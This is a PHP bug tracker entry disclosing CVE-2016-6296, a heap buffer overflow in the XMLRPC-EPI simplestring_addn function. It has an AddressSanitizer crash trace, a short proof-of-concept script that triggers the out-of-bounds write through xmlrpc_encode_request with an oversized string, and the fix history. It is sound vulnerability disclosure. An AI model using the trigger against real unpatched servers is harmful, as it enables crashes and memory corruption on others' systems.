PHP :: Sec Bug #72606 :: heap-buffer-overflow (write) simplestring_addn simplestring.c
| Sec Bug #72606 | heap-buffer-overflow (write) simplestring_addn simplestring.c | ||||
|---|---|---|---|---|---|
| Submitted: | 2016-07-17 09:08 UTC | Modified: | 2016-07-25 15:21 UTC | ||
| From: | pranjal dot jumde at gmail dot com | Assigned: | stas (profile) | ||
| Status: | Closed | Package: | XMLRPC-EPI related | ||
| PHP Version: | 5.5.37 | OS: | All | ||
| Private report: | No | CVE-ID: | 2016-6296 | ||
[2016-07-17 09:08 UTC] pranjal dot jumde at gmail dot com
Description: ------------ String length checks in simplestring_addn in simplestring.c use length as signed integers. This can be used by a malicious php script to cause out of bounds write on the heap. Tested on: git source https://github.com/php/php-src.git. Commit version: 735bec4f4018a4009a37d96489afe941c1ad711a compiled with address sanitizer. Repro steps: Run the attached php script with xmlrpc enabled version of php. $php poc.php ================================================================= ==57127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000bac0 at pc 0x00010a958bfe bp 0x7fff56c74b50 sp 0x7fff56c74310 WRITE of size 2147483581 at 0x60c00000bac0 thread T0 #0 0x10a958bfd in __asan_memcpy (libclang_rt.asan_osx_dynamic.dylib+0x41bfd) #1 0x10995aeb5 in simplestring_addn simplestring.c:212 #2 0x10996293d in simplestring_out_fptr xml_element.c:513 #3 0x109962580 in xml_element_serialize xml_element.c:281 #4 0x109962025 in xml_element_serialize xml_element.c:482 #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542 #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714 #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700 #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675 #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432 #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474 #11 0x109b1c4ab in zend_execute_scripts zend.c:1447 #12 0x1099b241e in php_execute_script main.c:2533 #13 0x109dee25d in do_cli php_cli.c:990 #14 0x109dec029 in main php_cli.c:1378 #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284) #16 0x1 (<unknown module>) 0x60c00000bac0 is located 0 bytes to the right of 128-byte region [0x60c00000ba40,0x60c00000bac0) allocated by thread T0 here: #0 0x10a961e07 in wrap_realloc (libclang_rt.asan_osx_dynamic.dylib+0x4ae07) #1 0x10995ae30 in simplestring_addn simplestring.c:205 #2 0x10996293d in simplestring_out_fptr xml_element.c:513 #3 0x109961b8d in xml_element_serialize xml_element.c:281 #4 0x109962025 in xml_element_serialize xml_element.c:482 #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542 #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714 #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700 #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675 #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432 #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474 #11 0x109b1c4ab in zend_execute_scripts zend.c:1447 #12 0x1099b241e in php_execute_script main.c:2533 #13 0x109dee25d in do_cli php_cli.c:990 #14 0x109dec029 in main php_cli.c:1378 #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284) #16 0x1 (<unknown module>) SUMMARY: AddressSanitizer: heap-buffer-overflow (libclang_rt.asan_osx_dynamic.dylib+0x41bfd) in __asan_memcpy Shadow bytes around the buggy address: 0x1c1800001700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x1c1800001710: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x1c1800001720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x1c1800001730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1c1800001740: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x1c1800001750: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa 0x1c1800001760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 fa 0x1c1800001770: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x1c1800001780: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x1c1800001790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1c18000017a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==57127==ABORTING Abort trap: 6 Test script: --------------- <?php ini_set('memory_limit', '2148M'); $max = 2147483582; $name = ''; for ($i = 1; $i<$max; $i++) { $name .= 'a'; } $request = xmlrpc_encode_request($name, "somevalue"); ?> Expected result: ---------------- No crash. Patch attached.
Patches
Pull Requests
History
AllCommentsChangesGit/SVN commits
[2016-07-17 20:27 UTC] stas@php.net
-Package: Reproducible crash +Package: XMLRPC-EPI related
[2016-07-17 23:49 UTC] stas@php.net
[2016-07-18 00:04 UTC] stas@php.net
[2016-07-18 00:16 UTC] pranjal dot jumde at gmail dot com
[2016-07-18 00:46 UTC] stas@php.net
[2016-07-18 18:03 UTC] pranjal dot jumde at gmail dot com
[2016-07-19 04:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
[2016-07-19 04:46 UTC] stas@php.net
-PHP Version: 7.1.0alpha3 +PHP Version: 5.5.37
[2016-07-19 06:33 UTC] pranjal dot jumde at gmail dot com
[2016-07-19 07:47 UTC] stas@php.net
-Status: Assigned +Status: Closed
[2016-07-19 15:56 UTC] pranjal dot jumde at gmail dot com
[2016-07-25 15:21 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2016-6296
[2016-10-20 03:44 UTC] nguyenluan dot vnn at gmail dot com